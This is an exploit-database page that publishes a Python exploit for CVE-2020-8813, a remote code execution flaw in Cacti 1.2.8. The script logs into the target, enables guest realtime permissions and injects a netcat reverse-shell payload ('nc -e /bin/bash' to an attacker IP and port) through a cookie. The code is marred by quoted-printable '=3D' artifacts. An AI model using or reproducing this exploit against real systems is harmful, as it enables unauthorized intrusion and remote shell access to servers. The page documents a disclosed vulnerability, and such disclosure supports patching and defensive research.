Cacti 1.2.8 Remote Code Execution

2020.02.24
Credit: Askar
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: Cacti 1.2.8 - Remote Code Execution # Date: 2020-02-03 # Exploit Author: Askar (@mohammadaskar2) # CVE: CVE-2020-8813 # Vendor Homepage: https://cacti.net/ # Version: v1.2.8 # Tested on: CentOS 7.3 / PHP 7.1.33 #!/usr/bin/python3 import requests import sys import warnings from bs4 import BeautifulSoup from urllib.parse import quote warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4') if len(sys.argv) !=3D 6: print("[~] Usage : ./Cacti-exploit.py url username password ip port") exit() url =3D sys.argv[1] username =3D sys.argv[2] password =3D sys.argv[3] ip =3D sys.argv[4] port =3D sys.argv[5] def login(token): login_info =3D { "login_username": username, "login_password": password, "action": "login", "__csrf_magic": token } login_request =3D request.post(url+"/index.php", login_info) login_text =3D login_request.text if "Invalid User Name/Password Please Retype" in login_text: return False else: return True def enable_guest(token): request_info =3D { "id": "3", "section25": "on", "section7": "on", "tab": "realms", "save_component_realm_perms": 1, "action": "save", "__csrf_magic": token } enable_request =3D request.post(url+"/user_admin.php?header=3Dfalse", r= equest_info) if enable_request: return True else: return False def send_exploit(): payload =3D ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) cookies =3D {'Cacti': quote(payload)} requests.get(url+"/graph_realtime.php?action=3Dinit", cookies=3Dcookies= ) request =3D requests.session() print("[+]Retrieving login CSRF token") page =3D request.get(url+"/index.php") html_content =3D page.text soup =3D BeautifulSoup(html_content, "html5lib") token =3D soup.findAll('input')[0].get("value") if token: print("[+]Token Found : %s" % token) print("[+]Sending creds ..") login_status =3D login(token) if login_status: print("[+]Successfully LoggedIn") print("[+]Retrieving CSRF token ..") page =3D request.get(url+"/user_admin.php?action=3Duser_edit&id=3D3= &tab=3Drealms") html_content =3D page.text soup =3D BeautifulSoup(html_content, "html5lib") token =3D soup.findAll('input')[1].get("value") if token: print("[+]Making some noise ..") guest_realtime =3D enable_guest(token) if guest_realtime: print("[+]Sending malicous request, check your nc ;)") send_exploit() else: print("[-]Error while activating the malicous account") else: print("[-] Unable to retrieve CSRF token from admin page!") exit() else: print("[-]Cannot Login!") else: print("[-] Unable to retrieve CSRF token!") exit()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top